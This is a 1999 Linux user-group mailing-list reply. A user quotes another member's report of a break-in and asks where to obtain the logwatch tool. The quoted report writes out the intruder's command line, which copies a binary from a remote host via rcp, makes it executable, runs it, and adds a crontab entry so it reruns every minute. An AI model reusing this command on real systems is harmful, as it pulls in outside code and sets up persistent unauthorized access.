[OLUG] RCP
Jason Ferguson
jferguson3 at home.com
Tue Dec 14 18:23:06 UTC 1999
Todd wrote:
> Can anyone tell me how to stop RCP access to my Linux box, and if there are
> any security tools available to monitor a RCP connection. On December 11
> someone gained access and perfomed the following to my machine:
> rcp tcstewar at 129.97.50.62:.../lin /usr/sbin/rpc.listen ; chmod +x
> /usr/sbin/rpc.listen; /usr/sbin/rpc.listen ; echo \* \* \* \* \*
> /usr/sbin/rpc.listen > cron ; crontab cron ; exit ;
> I currently am running logwatch and uwatch, but this connection did not
> show up in either. Any suggestions would be welcomed.
>
> -------------------------------------------------------------------------
> Sent by OLUG Mailing list Manager, run by ezmlm. http://olug.bstc.net/
> To unsubscribe: `echo unsubsribe | mail olug-unsubscribe at bstc.net`
Anyone got a location to grab logwatch? Doesnt seem to have come with RH 6.1... with
a cable modem its only a matter of time before someone tries this stuff with me, and I
still doing have a decent firewall on this thing (I still dont know how the rules
should be written, what to block, etc).
Jason
-------------------------------------------------------------------------
Sent by OLUG Mailing list Manager, run by ezmlm. http://olug.bstc.net/
To unsubscribe: `echo unsubsribe | mail olug-unsubscribe at bstc.net`
More information about the OLUG
mailing list